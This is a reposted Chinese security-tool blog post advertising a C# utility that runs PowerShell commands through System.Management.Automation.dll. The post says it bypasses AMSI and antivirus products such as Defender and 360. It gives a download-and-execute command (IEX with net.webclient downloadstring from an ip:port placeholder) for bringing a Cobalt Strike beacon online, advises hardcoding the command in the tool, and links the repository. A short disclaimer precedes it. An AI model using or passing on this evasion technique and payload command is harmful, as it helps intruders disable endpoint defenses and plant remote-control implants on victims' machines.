powershell命令免杀的小工具

wangqiang

​ powershell命令免杀的小工具
H4de5-7 Web安全工具库 2022-11-24 08:00 发表于河南
转载自：powershell命令免杀的小工具


免责声明
请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，
作者不为此承担任何责任。工具来自网络，安全性自测，如有侵权请联系删除。



0x01 工具介绍
powershell命令免杀的小工具，可过Defender、360等，可执行上线cobaltstrike、添加计划任务等。AMSI绕过+Automation执行powershell命令。
理论上来说遇到禁用powershell的情况也可以通过该工具执行powershell的命令。

​

0x02 安装与使用
思路很简单，很久之前就有了，工具调用
C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation目录下面的System.Management.Automation.dll执行底层api来绕过杀软对powershell的监控，同时绕过AMSI的检测。
由于patch绕过AMSI的方法会被360查杀，因此这里使用了设置System.Management.Automation.AmsiUtils的方法来绕过。
这里用+加号替换了命令中空格，当然这就是一个命令的加载器，具体怎么加密命令有各种各样的方法。
由于是C#，因此可以用execute-assembly内存执行的方式来不落地执行，不过cs本身的powerpick就实现了这个功能，这里只是单拿出来做一个小工具。

师傅们注意避免用powershell命令，上线cobaltstrike只需要Csharp.exe IEX+((new-object+net.webclient).downloadstring('http://ip:port/a'))裸命令，
如果以powershell开头那么还是会调用powershell被360拦截的。

想单纯来上线cs的师傅可以把IEX开头的powershell命令写定在程序里的myPipeLine.Commands.AddScript参数中

​

0x03 项目链接下载
1、项目地址下载：GitHub - H4de5-7/powershell-bypass: powershell命令免杀的小工具，可过Defender、360等，可执行上线cobaltstrike、添加计划任务等。 A powershell loader bypass anti-virus
2、关注公众号"web安全工具库"，后台回复：20221124


​